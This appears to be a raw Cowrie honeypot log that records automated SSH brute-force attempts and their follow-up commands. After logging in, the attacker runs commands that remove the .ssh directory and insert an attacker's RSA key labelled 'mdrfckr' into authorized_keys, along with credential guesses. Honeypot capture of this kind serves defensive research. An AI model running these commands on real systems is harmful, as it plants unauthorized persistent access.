{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42202,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc515fd269cd","protocol":"ssh","message":"New connection: 212.227.235.229:42202 (1.2.3.4:22) [session: dc515fd269cd]","sensor":"my-vps","timestamp":"2025-09-09T02:14:57.965028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:14:57.966076Z","src_ip":"212.227.235.229","session":"dc515fd269cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:14:58.052531Z","src_ip":"212.227.235.229","session":"dc515fd269cd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:14:58.439273Z","src_ip":"212.227.235.229","session":"dc515fd269cd"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:59.527838Z","src_ip":"212.227.235.229","session":"dc515fd269cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42210,"dst_ip":"1.2.3.4","dst_port":22,"session":"1716afc7a053","protocol":"ssh","message":"New connection: 212.227.235.229:42210 (1.2.3.4:22) [session: 1716afc7a053]","sensor":"my-vps","timestamp":"2025-09-09T02:14:59.613326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:14:59.614128Z","src_ip":"212.227.235.229","session":"1716afc7a053"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:14:59.700664Z","src_ip":"212.227.235.229","session":"1716afc7a053"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:15:00.088261Z","src_ip":"212.227.235.229","session":"1716afc7a053"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:00.177236Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:00.178170Z","src_ip":"212.227.235.229","session":"1716afc7a053"}
{"eventid":"cowrie.session.closed","duration":12.808305740356445,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:02.577901Z","src_ip":"212.227.125.160","session":"9c396a109703"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43560,"dst_ip":"1.2.3.4","dst_port":23,"session":"26415df62a7c","protocol":"telnet","message":"New connection: 212.227.125.160:43560 (1.2.3.4:23) [session: 26415df62a7c]","sensor":"my-vps","timestamp":"2025-09-09T02:15:02.791655Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44289,"dst_ip":"1.2.3.4","dst_port":23,"session":"aa65350cf155","protocol":"telnet","message":"New connection: 212.227.125.160:44289 (1.2.3.4:23) [session: aa65350cf155]","sensor":"my-vps","timestamp":"2025-09-09T02:15:08.061613Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52184,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc5a5867be57","protocol":"ssh","message":"New connection: 212.227.235.229:52184 (1.2.3.4:22) [session: cc5a5867be57]","sensor":"my-vps","timestamp":"2025-09-09T02:15:09.772050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:15:09.773265Z","src_ip":"212.227.235.229","session":"cc5a5867be57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:15:09.882952Z","src_ip":"212.227.235.229","session":"cc5a5867be57"}
{"eventid":"cowrie.login.failed","username":"tester","password":"12345678","message":"login attempt [tester/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T02:15:10.324932Z","src_ip":"212.227.235.229","session":"cc5a5867be57"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:11.437602Z","src_ip":"212.227.235.229","session":"cc5a5867be57"}
{"eventid":"cowrie.session.closed","duration":12.749276638031006,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:15.540830Z","src_ip":"212.227.125.160","session":"26415df62a7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43796,"dst_ip":"1.2.3.4","dst_port":23,"session":"18dab5b34cf6","protocol":"telnet","message":"New connection: 212.227.125.160:43796 (1.2.3.4:23) [session: 18dab5b34cf6]","sensor":"my-vps","timestamp":"2025-09-09T02:15:15.765893Z"}
{"eventid":"cowrie.session.closed","duration":13.573615789413452,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:21.635155Z","src_ip":"212.227.125.160","session":"aa65350cf155"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52832,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0447c0f858a","protocol":"ssh","message":"New connection: 212.227.235.229:52832 (1.2.3.4:22) [session: b0447c0f858a]","sensor":"my-vps","timestamp":"2025-09-09T02:15:26.133421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:15:26.140262Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:15:26.394075Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59582,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3e1a9c70349","protocol":"ssh","message":"New connection: 212.227.235.229:59582 (1.2.3.4:22) [session: f3e1a9c70349]","sensor":"my-vps","timestamp":"2025-09-09T02:15:26.665398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:15:26.666022Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:15:26.976181Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer4321","message":"login attempt [root/Qwer4321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:15:27.427387Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:15:27.970584Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:15:27.971481Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:15:27.972866Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:28.231483Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.login.success","username":"root","password":"scenic","message":"login attempt [root/scenic] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:15:28.256830Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.session.closed","duration":12.793486595153809,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:28.559320Z","src_ip":"212.227.125.160","session":"18dab5b34cf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43976,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7667eb83e3f","protocol":"telnet","message":"New connection: 212.227.125.160:43976 (1.2.3.4:23) [session: d7667eb83e3f]","sensor":"my-vps","timestamp":"2025-09-09T02:15:28.778770Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:15:28.866083Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:15:28.866777Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:15:28.944995Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:15:28.945691Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:15:28.946511Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:15:29.126531Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:29.127372Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:29.256444Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53530,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cc1db6ab3b9","protocol":"ssh","message":"New connection: 212.227.235.229:53530 (1.2.3.4:22) [session: 0cc1db6ab3b9]","sensor":"my-vps","timestamp":"2025-09-09T02:15:29.382767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:15:29.390790Z","src_ip":"212.227.235.229","session":"0cc1db6ab3b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:15:29.642923Z","src_ip":"212.227.235.229","session":"0cc1db6ab3b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:15:29.892263Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:15:29.893083Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:15:30.204563Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:30.205454Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33074,"dst_ip":"1.2.3.4","dst_port":22,"session":"10134b915200","protocol":"ssh","message":"New connection: 212.227.235.229:33074 (1.2.3.4:22) [session: 10134b915200]","sensor":"my-vps","timestamp":"2025-09-09T02:15:30.414958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:15:30.416826Z","src_ip":"212.227.235.229","session":"10134b915200"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:15:30.663703Z","src_ip":"212.227.235.229","session":"0cc1db6ab3b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"mac